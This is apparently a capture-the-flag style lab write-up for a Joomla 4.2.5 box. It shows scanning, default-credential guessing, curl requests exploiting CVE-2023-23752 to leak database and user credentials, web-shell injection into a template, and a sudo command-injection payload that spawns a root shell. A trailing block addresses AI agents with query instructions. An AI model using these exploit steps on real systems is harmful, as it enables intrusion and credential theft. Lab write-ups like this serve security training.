# Samurai (Easy) - Samurai
LAB LINK : [ HACKSMARTER](https://www.hacksmarter.org/courses/3b3f3073-3242-4aee-9bcd-0fb058ce4e13/take)
AUTHOR : [Streetcoder](https://www.linkedin.com/in/fadi-raad-84b16b208/)
### Scanning
```
nmap -p- -vvv --min-rate 1000 10.1.152.184
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 62
80/tcp open http syn-ack ttl 62
```
```
nmap -p22,80 -sC -sV 10.1.152.184
```
### Web Enumeration
* Initial browsing revealed no interesting endpoints or navigation elements on the main page.
### Directory FUZZING
```
ffuf -u http://10.1.152.184/FUZZ -w /usr/share/wordlists/dirb/common.txt -ic -ac
```
Found `/administrator` endpoint this seems interesting visting it, revealed Joomla CMS
Tried basic default creds
```
admin :
admin : admin
admin : password
root : root
root : toor
```
#### Joomla Version Detection
Running joomscan i found the version Joomla 4.2.5
```
joomscan --url http://10.1.152.184/
```
But we could have found the version by manually navigating to below endpoint
{% hint style="info" %}
A Joomla! installation’s version can be remotely extracted without authentication by querying one of a few different endpoints
{% endhint %}
```
curl -s http://10.1.152.184/administrator/manifests/files/joomla.xml | grep -i ''
```
Doing Googling about the Joomla version i found an article from [VulnCheck](https://www.vulncheck.com/blog/joomla-for-rce)
Joomla 4.2.5 is vulnerable to an information disclosure vulnerability (CVE-2023-23752) that allows unauthenticated attackers to access sensitive configuration endpoints.
According to the article we can get the information about the system configuration that is leaking
```
curl -s 'http://10.1.152.184/api/index.php/v1/config/application?public=true'
```
**Extracted Credentials:**
```
└─$ curl -s 'http://10.1.152.184/api/index.php/v1/config/application?public=true' | jq . | grep -i 'user\|password'
"user": "joomla425",
"password": "Pa847word987@Joomla456",
```
*Note: These credentials did not work for SSH or Joomla admin panel.*
\+ also i tried with changing username to admin, administrator, root but no luck.
instead of leaking the **`MySQL`** credentials, the attacker can leak the Joomla! user database using CVE-2023-23752:
```
curl -s http://10.1.152.184/api/index.php/v1/users?public=true | jq .
```
Now we have new username : `Miyamoto`
and we had the password
### Authenticated in Joomla
Now this creds ain't worked on ssh but it indeed worked on joomla login page
Navigated to **System → Site Templates → Cassiopeia Details and Files > Index.php**
Edited `index.php` and injected web shell code (webshell); saved
Navigating to the [templates/cassiopeia/index.php](http://10.1.152.184/templates/cassiopeia/index.php) i have the webshell
### Priv Esc | Command Injection
```
sudo -l
```
```
strings /opt/backup/DbMaria
```
**This is Command injection** attack via the argument passed to `system()`
We can pass `'superman; id #-- -'`, the final string becomes:
```
mariadb-dump --socket=... -u root test; id # -- > /tmp/backup.sql
```
```
sudo /opt/backup/DbMaria ';id #-- '
```
```
sudo /opt/backup/DbMaria 'l1nuxkid; /bin/bash -p # --//'
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/hacksmarter-labs/samurai-easy-samurai.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.